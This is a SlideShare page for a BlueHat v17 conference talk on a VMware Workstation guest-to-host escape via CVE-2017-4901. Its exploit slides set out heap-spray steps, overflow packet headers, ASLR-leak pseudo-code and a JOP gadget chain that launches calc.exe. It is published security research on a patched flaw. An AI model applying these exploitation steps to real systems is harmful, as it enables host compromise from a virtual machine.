SlideShare una empresa de Scribd logo

BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully

Descargar como PPT, PDF
BlueHat Security Conference
BlueHat Security Conference

Lei Shi & Mei Wang, Qihoo 360 Virtualization is one of the most complicated software in the world. The VMware workstation is very popular in many fields. The windows 10 has a lot of mitigation technology to get avoid of exploitation. It's a great challenge to make a vm escape in VMware workstation under Win 10. Especially when the guest and host are both win 10 and the guest user are NO-ADMIN. This talk will present how to make a vm escape and execute arbitrary code in the host from a NO-ADMIN guest user under Win 10(both the guest and host are Win 10). They have developed three different exploitation. This talk will introduce them and show a very elegant exploitation technology of vm escape. Besides the vm escape technology, this talk will also show the exploitation technology in Win 10. It is quite attractive because there's a process continuation, saying that the guest can execute the exploitation without crashing/disturbing the host process(VMware workstation virtual machine process). The exploitation is very reliable, it reaches nearly 100% successful rate.

Tecnología
1 de 53
Out of The Truman Show: VM escape in VMware gracefully Lei Shi && Mei Wang
 Lei Shi is a security researcher of 360-CERT, mainly focus on cryptography security and vulnerability discovery. He has discovered 100+ bugs and gained 20+ CVEs(E.g: OpenSSL Death Alert) from OpenSSL, OpenSSH, VMware. He obsesses with math and computer security, and currently is working on Windows Search protocol security, Linux kernel security and development of vulnerability discovery tools.  Mei Wang is a security researcher of the Gear Team of Qihoo 360 Inc., mainly focus on vulnerability discovery and fuzz technology. In the last year, she already gained 10+ CVEs from Firefox, Safari, Solr, Libtiff. She has made a talk in CanSecWest 2017, Syscan360. She is currently working on browser security and fuzz tools development using math and machine learning. About Us
a. Attack surface of VMware Workstation b. VMware RPCI and backdoor c. VMware Fuzz Framework d. CVE-2017-4901 e. Exploit f. Demo g. Conclusion Agenda
 History vulnerabilities  Attack surface ① Attack surface of VMware Workstation Attack surface of VMware Workstation
http://cve.mitre.org 17 / 10/24 ① Attack surface of VMware Workstation
① Attack surface of VMware Workstation  VMCI (CVE-2017-4901) VMCI (VMware Virtual Machine Communication Interface), a high-speed interface that virtual machines on the same host use to communicate with each other and the host kernel modules. It’s an optional function, if enabled, Guest could execute command use vmware-vmx.exe process in the Host machine. When VMware Tools were installed in the Guest, VMCI was enabled to communication.  IOCTL(CVE-2014-2384) A device input and output control interface to allow application in the user space to communicate with Vmkernel in the kernel space.  COM port (CVE-2017-4908 ~ 4913) Features like printer are implemented basic on com port 。 There are many vulnerabilities discovered in COM port, especially True Type Font parser and JPEG2000 parser in the TPView.dll.  Device Drivers (sound card, network card, graphics card, USB…) (CVE-2017-4900)
 RPCI  Backdoor ② RPCI and Backdoor RPCI and Backdoor
② RPCI and Backdoor  Backdoor: a communication mechanism between VMware Host and Guest. Send message through the VMware special I/O port Support multiple commands.  RPCI: Remote Procedure Call Interface Based on Backdoor Guest can send request to Host: Drag and Drop, copy paste… Format: <command><parameters> vmware-vmx.exe handles every RPCI commands.
② RPCI and Backdoor
② RPCI and Backdoor
② RPCI and Backdoor
② RPCI and Backdoor
② RPCI and Backdoor info-set/info-get vmx.capability.unified_loop tools.capability.guest_temp_directory guest.upgrader_send_cmd_line_args/ toolsAutoInstallGetParams tools.capability.dnd_version tools.capability.copypase_version vmx.capability.dnd_version vmx.capability.copypase_version unity.window.contents.start unity.window.contents.chunk copypaste.transport
② RPCI and Backdoor
③ Fuzz Framework Fuzz Framework
③ Fuzz Framework
③ Fuzz Framework  Guest Run a backdoor command fuzz  Host a) Pageheap must be opened b) Injecting a memory monitor to recode memory use and capture out-of-bounds read/write and heap use- before-init vulnerabilities. Memory monitor delayed free object to capture double-free and UAF vulnerabilities. c) Out-of-bounds of stack variabilities is difficult to capture, so we used pin to handle command processing functions specially d) A stack scanner introduced to capture stack use-before-init vulnerabilities. e) Vsock was used to feedback paths of some interested functions to help Guest fuzz constraint variable range better.
③ Fuzz Framework  UAF “tools.capability.dnd_version” When dnd_version is set 2, an arbitrary 0x100 bytes data can be filled in memory, then call command copypaste.transport and control RIP and R8.  Continuous Out-of-bounds Write “copypaste.transport” Further detail will be discussed later.
④ CVE-2017-4901 CVE-2017-4901
④ CVE-2017-4901 The Drag-and-Drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a Guest to execute code on the operation system that runs Workstation or Fusion.  VMware Workstation Pro before 12.5.4  Exists in DnD version 3  We can control the overflow size.  Multi out-of-bounds write  Combing with some commands, out-of-bounds Read  Information leak and arbitrary code execute if we put the out-of-bounds Write/Read before an appropriate object.
④ CVE-2017-4901 [1]
④ CVE-2017-4901  packetSize == packet->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE  packetSize <= DND_MAX_TRANSPORT_PACKET_SIZE  Packet->payloadSize + packet->offset <= packet->totalSize  Packet->totalSize <= DNDMSG_MAX_ARGSZ  The totalSize of first packet specifies the size of buffer allocated on the heap.  For the first packet, the member packet->offset must be 0.  All the packets in the same message must have same seqNum.
④ CVE-2017-4901 [3] [2]
④ CVE-2017-4901
⑤ Exploit Exploit
⑤ Exploit  If we want to gain code execute, we need to coverage a function pointer on the heap or overwrite a vtable of a C++ object  Ideally, if we put the OOB-Write/Read before an appropriate object, we can achieve both information disclosure (defeat ASLR ) and arbitrary code execution. vul trans block info-set/get buffer DnD/CP object overflow overflow
⑤ Exploit LFH ( Windows Low Fragmented Heap) LFH is used for allocations with size 1 to 16368(0x3FF0) bytes, prevents fragmentation by using a bucketing scheme which causes similarly-sized blocks to be allocated from larger pre-allocated blocks of memory. The LFH buckets are only activated if their corresponding allocation size are detected to be popular. It would be better to choose a least used suitable block.
⑤ Exploit LFH If we want to allocate three contiguous memory blocks (vul trans block , info-set/get block , DnD/CP object) , we can follow the steps below. Notes, the LFH size of X0, X1, Y0, Y1, Y2 is not activated before.
⑤ Exploit LFH An suitable and precise heap spray can form three contiguous memory buckets. Ideally, we can gain three buckets as follows. bucket bucket n bucket (n+1) bucket (n+2) Memory Growth Direction
⑤ Exploit A full bucket Free obj X alloc obj Y LFH Free and reuse a full buckets. Under normal circumstances, because of LFH, free a memory and allocate the same size memory again, we may not occupy the memory freed previous, but it is an exception for a full buckets.
⑤ Exploit HeapSpray: vmx.capability.unified_loop Bucket1 : tools.capability.guest_temp_directory 1 G000G======= Bucket2 : (beaconStr) guest.upgrader_send_cmd_line_args G000G*************** Bucket3: (set dndVersion 3) tools.capability.dnd_version 3 tools.capability.copypaste_version 3 vmx.capability.dnd_version vmx.capability.copypaste_version Size: 0xB0(0x10(head)+0xA0) [b][c]GGGGGGGGGG…………GGGG ………………………… [1][3]GGGGGGGGGG…………GGGG G000G===========.……..====GG0 [a][a]GGGGGGGGGG…………GGGG ………………………… [a][a]GGGGGGGGGG…………GGGG G000G*****************.……..*********0 [3][5]GGGGGGGGGG…………GGGG ………………………… [6][7]GGGGGGGGGG…………GGGG DnD/CP object [8][9]GGGGGGGGGG…………GGGG ………………………… [d][e]GGGGGGGGGG…………GGGG [a][a]GGGGGGGGGG…………GGGG Bucket1 Bucket2 Bucket3
⑤ Exploit Send command “tools.capability.guest_temp_directory 1 azbo” [b][c]GGGGGGGGGG…………GGGG ………………………… [1][3]GGGGGGGGGG…………GGGG [a][a]GGGGGGGGGG…………GGGG ………………………… [a][a]GGGGGGGGGG…………GGGG G000G*****************.……..*********0 [3][5]GGGGGGGGGG…………GGGG ………………………… [6][7]GGGGGGGGGG…………GGGG DnD/CP object [8][9]GGGGGGGGGG…………GGGG ………………………… [d][e]GGGGGGGGGG…………GGGG [a][a]GGGGGGGGGG…………GGGG G000G===========.……..====GG0FreeBucket1 Bucket2 Bucket3
⑤ Exploit DnDTransportPacketHeader h1; h1.totalSize=0xA0; h1.offset=0; h1.payloadSize=0x90 Command: copypaste.transport &h1 000000000000000 [b][c]GGGGGGGGGG…………GGGG ………………………… [1][3]GGGGGGGGGG…………GGGG [a][a]GGGGGGGGGG…………GGGG ………………………… [a][a]GGGGGGGGGG…………GGGG G000G******************. ……..*********0 [3][5]GGGGGGGGGG…………GGGG ………………………… [6][7]GGGGGGGGGG…………GGGG DnD/CP object [8][9]GGGGGGGGGG…………GGGG ………………………… [d][e]GGGGGGGGGG…………GGGG [a][a]GGGGGGGGGG…………GGGG FreeG000G000000000000……….…GGGG Bucket1 Bucket2 Bucket3
⑤ Exploit DnDTransportPacketHeader h1; h1.type=3; h1.seqNum = seq; h1.totalSize=0xA0; h1.offset=0; h1.payloadSize=0x90 Command: copypaste.transport &h1 000000000000000 0xB0 (Free) Head(0x10) h1.payloadSize=0x90 totalSize(0xA0) h1.offset(0x90) 0xB0 0xB0 Head(0x10) Head(0x10)
⑤ Exploit DnDTransportPacketHeader h2; h2.type = h1.type = 3; h2.seqNum = h1.seqNum = seq; h2.tatalSize=0xA000; h2.offset=h1.payloadSize=0x90; h2.payloadSize = 0x20 Command: copypaste.transport &h2 000000000000000 0xB0 Head(0x10) h1.payloadSize=0x90 totalSize(0xA0) h1.offset(0x90) 0xB0 0xB0 overwriteHead(0x10) Head(0x10) h2.payloadSize=0x20 h2.offset(0xB0)
⑤ Exploit h2.offset = 0x90+0x20=0xB0; h2.payloadSize = 0xA0+0x10 = 0xB0; Command: copypaste.transport &h2 000000000000000 0xB0 Head(0x10) h1.payloadSize=0x90 totalSize(0xA0) h1.offset(0x90) 0xB0 0xB0 overwriteHead(0x10) Head(0x10) h2.payloadSize=0x20 h2.payloadSize=0xB0 h2.offset(0xB0) h2.offset(0x160)
⑤ Exploit pos = 0; While (TRUE): overwrite 0xB0 if(pos==0) { command: ToolsAutoInstallGetParams Message_Receive(chan, &buf, &rsize) if(buf[2]==‘0’) //beaconStr(bucket 2) { pos = 0xB0 if(rsize > pos+4) if( buf[pos+2] == 0x40 && buf[pos+3] == 0x9A ) calculate base address } } else { pos += 0xB0; command: ToolsAutoInstallGetParams Message_Receive(chan, &buf, &rsize) if(rsize > pos+4) if( buf[pos+2] == 0x40 && buf[pos+3] == 0x9A ) calculate base address } G000G*******……………….***** ************************************ ************************************ ************************************ ************************************ ************************************ 0 0xB0 [flag1] [flag2]GGGGGGGGGGGGGGG GG…….GGGGGGGGGGGGG GGGGGGGGGGGGGGGGGG GGGGGGGGGGGGGGGGGG GGGGGGGGGGGGGGGGGG GGGGGGGGGGGGG0 [40][9A][xx][xx][xx][xx][00] [00]??????????????????????? ?????????????????????????? ??????.....????????????????? ?????????????????????????? ?????????????????????????? ????? Head(0x10) 0xB0 0xB0 Head(0x10) Head(0x10) 00000000000000000000000000 00000……………….000000000 00000000000000000000000000 00000000000000000000000000 00000000000000000000000000 00000000000000000000000000 00000000000000000000000000pos=0xB0 00000000000000000000000000 00000……………….000000000 00000000000000000000000000 00000000000000000000000000 00000000000000000000000000 00000000000000000000000000 00000000000000000000000000pos
⑤ Exploit
⑤ Exploit Calculate Base The ASLR is not affect the lowest two bytes. DnD/CP object 0x40 0x9A xx xx xx xx 00 00 ????
⑤ Exploit
⑤ Exploit Layout unity.window.contents.start unity.window.contents.chunk Dnd/CP object [X]fixed address jop jop jop jop … Global variable [X+0x08]window_id [X+0x0C]counter [X+0x10]window_width [X+0x14]window_height [X+0x28]contents_base Low 32 bits of JOP High 32 bits of JOP Low 32 bits of original address High 32 bits of original address Address of string calc.exe [JOP]
⑤ Exploit 1. Close the vmtoolsd process In order to reduce interference, search VMwareDragDetWndClass and send message WM_CLOSE. 2. Fill memory fragmentation; Loop 0x4A80 times Use vmx.capability.unified_loop instead of info-set for heap spray Size 0xA0+0x10 Keep the first two bytes unique.
⑤ Exploit 3. Generate three full bucket A suitable and precise heap spray can form three continuous memory buckets. But, in practical application. Info-set/get is unreliable and cause memory allocate multiple times and form memory hole. Using guest.upgrader_send_cmd_line_args, ToolsAutoInstallGetParams to replace info-set and info-get.
⑤ Exploit 3. Generate three full bucket For the first bucket, using tools.capability.guest_temp_directory to occupy position For the Second bucket, insert a readable string BeaconStr using “guest.upgrader_send_cmd_line_args” For the third bucket, set a DnD/CP version 3 object tools.capability.dnd_version 3 tools.capability.copypaste_version 3 vmx.capability.dnd_version vmx.capability.copypaste_version Call “tools.capability.guest_temp_directory”again, remove the first placeholder and use vulnerable transport block to reoccupy the first buckets.
⑤ Exploit 4. Find BeaconStr Call “copypaste.transport”to continuous overwrite the memory behind, 0xB0 bytes each time. Use ToolsAutoInstallGetParams to read the BeaconStr in the second buckets until found its contents was changed. 5. Find Dnd/CP version 3 object Call copypaste.transport to continuous overwrite the memory behind, 0xB0 bytes each time. Use ToolsAutoInstallGetParams to read the BeaconStr in the second buckets until found its contents was the desired address(ASLR will not change the lowest tow bytes of address). 6. Calculate base address and verify validate Calculate base address
⑤ Exploit 7. Layout Now, we got the base address, and then calculated the needed address. Call unity.window.contents.start and layout the low 32 bits of JOP address and original call address to global variable area. Call unity.window.contents.chunk and use its counter object to push the high 32s bit of JOP address, moreover, put the string address“C:windowssystem32calc.exe”to contents_base. Finally Layout : If the fixed address is X: window_id = X+8; //Low 32 bit of JOP address counter = X+0x0C; //High 32 bit of JOP address window_width = X+0x10; //Low 32 bit of original call address window_height = X+0x14; //High 32 bit of original call address contents_base = X + 0x28; // Address of string C:windowssystem32calc.exe
⑤ Exploit 8. Overwrite DnD/CP version 3 object Call copypaste.transport again and overwrite 8 bytes with address X. 9. JOP We can control R8 when call “copypaste.transport” unsigned long long jop[] = { j0, d0, 0, j1, 0, j2, 0, 0, j3, 0, 0, 0, j4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, j5, 0, 0, d1 }; Message_Send(channel, jop, sizeof(jop)); Start = JOP_base (in step 7): mov rcx, r8 call qword ptr [r8+60h] // to j4 j4: mov rdx, [r8+8] // d0 call qword ptr [r8] // to j0 j0: mov rax, rdx mov rdx, [rcx+170h] // d1 mov r8, rcx mov rcx, rax jmp qword ptr [r8+158h] // to j5 j5: mov [rdx+28h], rax jmp qword ptr [r8+18h] // to j1 j1: pop rdi jmp qword ptr [r8+28h] // to j2 j2: pop rdi jmp qword ptr [r8+40h] // to j3 j3: xxx
⑤ Exploit 10. Recovery Reverse JOP operation of previous step.
⑥ Demo Demo
⑥ Demo
⑦ Conclusion Conclusion
⑦ Conclusion  The success rate of our exploit exceeds 95%(96.7%);  No pwn no fun.
件制作课 Shilei-c@360.cn wangmei.S102@gmail.com Any Questions? Thanks!

Recomendados

CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCanSecWest
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...idsecconf
 
Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Angel Boy
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Shell scripting
Shell scriptingShell scripting
Shell scriptingManav Prasad
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
 

Recomendados

CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCanSecWest
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...idsecconf
 
Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Angel Boy
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Shell scripting
Shell scriptingShell scripting
Shell scriptingManav Prasad
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
TMUX Rocks!
TMUX Rocks!TMUX Rocks!
TMUX Rocks!Kent Chen
 
RAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial TradecraftRAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial Tradecraft⭕Alexander Rymdeko-Harvey
 
Process injection - Malware style
Process injection - Malware styleProcess injection - Malware style
Process injection - Malware styleSander Demeester
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalationSongchaiDuangpan
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans Rosén
 
How to find_vulnerability_in_software
How to find_vulnerability_in_softwareHow to find_vulnerability_in_software
How to find_vulnerability_in_softwaresanghwan ahn
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Basic Linux Security
Basic Linux SecurityBasic Linux Security
Basic Linux Securitypankaj009
 
Unsecuring SSH
Unsecuring SSHUnsecuring SSH
Unsecuring SSHJeremy Brown
 
Linux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowLinux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowAngel Boy
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Code Injection in Windows
Code Injection in WindowsCode Injection in Windows
Code Injection in Windowsn|u - The Open Security Community
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniqueAngel Boy
 
Evil Twin
Evil TwinEvil Twin
Evil Twinn|u - The Open Security Community
 
Shell Scripting
Shell ScriptingShell Scripting
Shell ScriptingGaurav Shinde
 
spinlock.pdf
spinlock.pdfspinlock.pdf
spinlock.pdfAdrian Huang
 
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCanSecWest
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
 
Reliable Windows Heap Exploits
Reliable Windows Heap ExploitsReliable Windows Heap Exploits
Reliable Windows Heap Exploitsamiable_indian
 
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
3-Way Scripts as a Practical Platform for Secure Distributed Code in CloudsTokyo University of Science
 
Rust Hack
Rust HackRust Hack
Rust HackViral Parmar
 

Más contenido relacionado

La actualidad más candente

Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
Process injection - Malware style
Process injection - Malware styleProcess injection - Malware style
Process injection - Malware styleSander Demeester
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalationSongchaiDuangpan
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans Rosén
 
How to find_vulnerability_in_software
How to find_vulnerability_in_softwareHow to find_vulnerability_in_software
How to find_vulnerability_in_softwaresanghwan ahn
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Basic Linux Security
Basic Linux SecurityBasic Linux Security
Basic Linux Securitypankaj009
 
Linux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowLinux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowAngel Boy
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniqueAngel Boy
 
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCanSecWest
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
 
Reliable Windows Heap Exploits
Reliable Windows Heap ExploitsReliable Windows Heap Exploits
Reliable Windows Heap Exploitsamiable_indian
 

La actualidad más candente (20)

Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
TMUX Rocks!
TMUX Rocks!TMUX Rocks!
TMUX Rocks!
 
RAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial TradecraftRAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial Tradecraft
 
Process injection - Malware style
Process injection - Malware styleProcess injection - Malware style
Process injection - Malware style
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalation
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
 
How to find_vulnerability_in_software
How to find_vulnerability_in_softwareHow to find_vulnerability_in_software
How to find_vulnerability_in_software
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Basic Linux Security
Basic Linux SecurityBasic Linux Security
Basic Linux Security
 
Unsecuring SSH
Unsecuring SSHUnsecuring SSH
Unsecuring SSH
 
Linux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowLinux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflow
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Code Injection in Windows
Code Injection in WindowsCode Injection in Windows
Code Injection in Windows
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit Technique
 
Evil Twin
Evil TwinEvil Twin
Evil Twin
 
Shell Scripting
Shell ScriptingShell Scripting
Shell Scripting
 
spinlock.pdf
spinlock.pdfspinlock.pdf
spinlock.pdf
 
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
Reliable Windows Heap Exploits
Reliable Windows Heap ExploitsReliable Windows Heap Exploits
Reliable Windows Heap Exploits
 

Similar a BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully

3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
3-Way Scripts as a Practical Platform for Secure Distributed Code in CloudsTokyo University of Science
 
Open Source Virtualization Hacks
Open Source Virtualization HacksOpen Source Virtualization Hacks
Open Source Virtualization HacksNiel Bornstein
 
Scaleable PHP Applications in Kubernetes
Scaleable PHP Applications in KubernetesScaleable PHP Applications in Kubernetes
Scaleable PHP Applications in KubernetesRobert Lemke
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Vincenzo Iozzo
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisTamas K Lengyel
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_enSunghun Kim
 
Practical Introduction To Linux
Practical Introduction To LinuxPractical Introduction To Linux
Practical Introduction To LinuxZeeshan Rizvi
 
Serverless security: defense against the dark arts
Serverless security: defense against the dark artsServerless security: defense against the dark arts
Serverless security: defense against the dark artsYan Cui
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitJongWon Kim
 
Serverless security: defence against the dark arts
Serverless security: defence against the dark artsServerless security: defence against the dark arts
Serverless security: defence against the dark artsYan Cui
 
Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015Logicaltrust pl
 
Import golang; struct microservice
Import golang; struct microserviceImport golang; struct microservice
Import golang; struct microserviceGiulio De Donato
 
Docker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platformsDocker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platformsFederico Michele Facca
 
Rooting Out Root: User namespaces in Docker
Rooting Out Root: User namespaces in DockerRooting Out Root: User namespaces in Docker
Rooting Out Root: User namespaces in DockerPhil Estes
 
Security in serverless world
Security in serverless worldSecurity in serverless world
Security in serverless worldYan Cui
 

Similar a BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully (20)

3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
 
Rust Hack
Rust HackRust Hack
Rust Hack
 
Open Source Virtualization Hacks
Open Source Virtualization HacksOpen Source Virtualization Hacks
Open Source Virtualization Hacks
 
Handout2o
Handout2oHandout2o
Handout2o
 
Scaleable PHP Applications in Kubernetes
Scaleable PHP Applications in KubernetesScaleable PHP Applications in Kubernetes
Scaleable PHP Applications in Kubernetes
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysis
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_en
 
Practical Introduction To Linux
Practical Introduction To LinuxPractical Introduction To Linux
Practical Introduction To Linux
 
Serverless security: defense against the dark arts
Serverless security: defense against the dark artsServerless security: defense against the dark arts
Serverless security: defense against the dark arts
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
 
Serverless security: defence against the dark arts
Serverless security: defence against the dark artsServerless security: defence against the dark arts
Serverless security: defence against the dark arts
 
Trust boundaries - Confidence 2015
